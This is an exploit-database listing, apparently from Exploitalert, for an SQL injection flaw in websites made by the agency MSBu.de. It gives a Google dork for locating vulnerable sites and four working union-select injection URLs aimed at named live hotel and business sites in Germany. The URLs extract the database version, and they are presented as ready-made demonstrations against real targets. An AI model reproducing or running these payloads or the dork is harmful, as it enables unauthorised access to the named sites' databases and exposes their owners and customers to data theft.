Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-89 | Not disclosed | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
MSBU | High | Remote | 2023-01-23 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/ | 0.02192 | 0.50148 |
********************************************************* #Exploit Title: Website by MSBu.de - Sql Injection Vulnerability #Date: 2023-01-23 #Exploit Author: Behrouz Mansoori #Google Dork: "Website by MSBu.de" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Website by MSBu.de" ### Demo : https://www.kaiserhof-bad-bellingen.de/en/special-offers.php?id=-21097%27%20%23AAAA%0Aunion%20%23AAAA%0Aselect%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--+&page= https://www.hirschen-staufen.de/aktuelles.php?id=11730%27%20%23AAAA%0Aunion%20%23AAAA%0Aselect%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--+&page= https://www.rosenhof-badenweiler.de/news.php?id=18841%27%20%23AAAAA%0Aunion%20%23AAAAA%0Aselect%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--+ https://www.sonne-muenstertal.de/kontakt.php?id=-15168%27%20%23AAAA%0Aunion%20%23AAAA%0Aselect%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.